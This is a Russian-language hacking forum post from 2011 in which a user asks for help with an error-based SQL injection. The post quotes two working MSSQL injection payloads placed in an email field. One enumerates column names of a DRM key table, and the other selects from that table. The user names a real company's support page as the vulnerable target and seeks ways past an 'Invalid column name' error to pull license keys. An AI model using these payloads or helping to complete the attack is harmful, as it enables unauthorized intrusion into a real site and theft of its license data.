
27.08.2011, 23:17
|
|
Познающий
Регистрация: 12.05.2011
Сообщений: 88
С нами:
7896566
Репутация:
1
|
|
Сообщение от KUKLOVOD2
значит все пытаюсь раскрутить эту скулю.Наблюдается интересное явление:при запросе
Код:
Email=1')+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFO RMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME='View_DRM_Keys'+AN D+COLUMN_NAME+NOT+IN+('asscode ','assigndate','AssignedDate','assignedtype','assi gnusername','binary_message_body','cdkey','CDSeria lNum'))--+&submit=Send+Registration+Key
мы видим что существует колонка code в таблице View_DRM_Keys.Но когда делаем выборку:
Код:
Email=1')+or+1=(SELECT+TOP+1+code+from+View_DRM_Ke ys)--+&submit=Send+Registration+Key
видим следующее:Invalid column name 'code'.Почему так?
Потом поэксперементировав я обнаружил, что вытаскивая колонки из разных таблиц, вытакскиваются колонки с одними и теме же именами, хотя в данных таблицах они могут и не существовать.Что можно предпринять?
up, вопрос еще актуален.Уязвимый сайт: http://socketmobile.com/support/wifi/pw.asp
|
|
|